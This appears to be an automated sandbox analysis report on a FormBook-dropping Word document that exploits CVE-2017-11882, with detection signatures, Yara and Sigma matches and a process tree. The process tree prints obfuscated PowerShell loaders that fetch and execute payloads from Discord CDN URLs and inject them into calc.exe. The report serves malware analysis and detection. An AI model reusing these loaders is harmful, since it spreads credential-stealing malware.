Loading ...

Play interactive tourEdit tour

Analysis Report Teklif Rusya 24 09 2020.doc

Overview

General Information

Sample Name:Teklif Rusya 24 09 2020.doc
Analysis ID:289495
MD5:63e31fd9190ac6115f7f0e86e55077ab
SHA1:36abaaf70244a713fd3033f64afd8823badd068e
SHA256:02426893e1fb6b3cc4dba759e7d85a0da3696d4753921487b49bddc629d6ff77
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Document exploit detected (creates forbidden files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: Office product drops script at suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Found suspicious RTF objects
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1324 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2372 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2512 cmdline: CmD.exe /C cscript %tmp%\rht.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 1552 cmdline: cscript C:\Users\user\AppData\Local\Temp\rht.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
        • cmd.exe (PID: 2628 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2516 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2820 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2836 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2872 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2984 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
  • powershell.exe (PID: 2352 cmdline: Powershell $BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F=@(40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,55,52,50,56,57,57,57,48,48,53,50,55,47,116,115,117,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,54,50,53,52,50,57,51,55,50,57,55,56,47,112,50,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,36,35,37,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F-join ''|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2200 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
  • powershell.exe (PID: 2912 cmdline: Powershell $BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F=@(40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,55,52,50,56,57,57,57,48,48,53,50,55,47,116,115,117,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,54,50,53,52,50,57,51,55,50,57,55,56,47,112,50,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,36,35,37,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F-join ''|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2476 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • chkdsk.exe (PID: 2316 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
          • cmd.exe (PID: 2680 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • firefox.exe (PID: 1916 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
        • 7nati0-xlrjdq.exe (PID: 1428 cmdline: C:\Program Files (x86)\F6lpdgn5p\7nati0-xlrjdq.exe MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • mstsc.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
  • powershell.exe (PID: 2424 cmdline: Powershell $BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F=@(40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,55,52,50,56,57,57,57,48,48,53,50,55,47,116,115,117,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,51,51,56,49,56,48,56,48,54,54,56,54,56,48,50,50,50,47,55,53,56,52,49,56,54,50,53,52,50,57,51,55,50,57,55,56,47,112,50,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,36,35,37,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$BD5F26AD6BD86BAE184191A0D6CBD69183240C9341AD31850E177786BC90BC77691AE2691784276AD40D5D5C9286925D4F-join ''|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2808 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Teklif Rusya 24 09 2020.docMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0xca8:$a3: 433a5c66616b65706174685c
  • 0xce0:$a3: 433a5c66616b65706174685c

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.2180585100.00000000003C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000015.00000002.2180585100.00000000003C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000015.00000002.2180585100.00000000003C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    00000018.00000002.2344006025.0000000000260000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000018.00000002.2344006025.0000000000260000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.calc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        23.2.calc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        23.2.calc.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18339:$sqlite3step: 68 34 1C 7B E1
        • 0x1844c:$sqlite3step: 68 34 1C 7B E1
        • 0x18368:$sqlite3text: 68 38 2A 90 C5
        • 0x1848d:$sqlite3text: 68 38 2A 90 C5
        • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
        21.2.calc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          21.2.calc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\rht.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\rht.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2372, ProcessCommandLine: CmD.exe /C cscript %tmp%\rht.vbs A C, ProcessId: 2512
          Sigma detected: Office product drops script at suspicious locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1324, TargetFilename: C:\Users\user\AppData\Local\Temp\rht.vbs
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule): Data: Command: cscript C:\Users\user\AppData\Local\Temp\rht.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\rht.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\rht.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2512, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\rht.vbs A C, ProcessId: 1552

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Teklif Rusya 24 09 2020.docVirustotal: Detection: 18%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000015.00000002.2180585100.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.2344006025.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.2343952655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2180615896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.2130936911.0000000000280000.00000040.00000001.sdmp, type: MEMORY
